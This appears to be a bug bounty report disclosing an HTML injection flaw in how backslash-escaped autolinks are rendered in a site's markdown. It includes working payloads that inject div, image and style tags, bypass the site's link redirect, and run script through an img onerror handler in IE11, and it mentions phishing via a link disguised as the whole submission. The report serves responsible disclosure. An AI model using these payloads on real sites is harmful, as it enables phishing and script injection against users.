Vulnerability with the way \ escaped characters in <http://danlec.com> style links are rendered

> <http://\<div\ style=\"font-size:24px;background:red;color:white;width:100%;height:48px;line-height:48px;text-align:center;\"\>Uh\ oh!</div\>> ## Basic POC: Sequences like `<http://\<h1\>test\</h1\>>` are rendered as `http://<h1>test</h1>` ## Examples of what could be done with this: Obviously there's a whole variety of stuff that can be done when you can inject arbitrary HTML, even in spite of the CSP protection. We can put in elements we're not supposed to (see above, where we've inserted an attention grabbing `div`) We can put in "arbitrary" images (i.e. profile pictures) ``` <http://\<img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\> ``` > <http://\<img\ src=\"https://profile-photos.hackerone-user-content.com/production/000/000/013/76b3a9e70495c3b7340e33cdf5141660ae26489b_large.png?1383694562\"\>> We can put in our own `<style>` tags, e.g. using ``` <http://\<style\>.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red !important}\</style\>> ``` > <http://\<style\>.markdownable\ blockquote{color:white;border:0;padding:0;margin:0;}a{color:red\ !important}\</style\>> ## Serious Exploits We can bypass HackerOne's link /redirect: ``` <http://\<a\ href=\"http://danlec.com\"\>Redirect\ bypassed\</a\>> ``` If we wanted to be particularly sneaky, we could use CSS to make a link cover the whole submission, so clicking anywhere would activate the link … which might allow us to do some phishing by having the link go to a fake HackerOne login screen. > <http://\<a\ href=\"http://danlec.com\"\>Redirect\ bypassed\</a\>> For browsers without good CSP support, like IE11, we can use this to run script on a victim when they try to view our submission using ``` <http://\<img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\>> ``` > <http://\<img\ style=\"display:none\"\ src=0\ onerror=\"alert(\'Uh\ oh\')\"\>> (If you're using IE11 for some reason, you'll get an alert when you view this submission)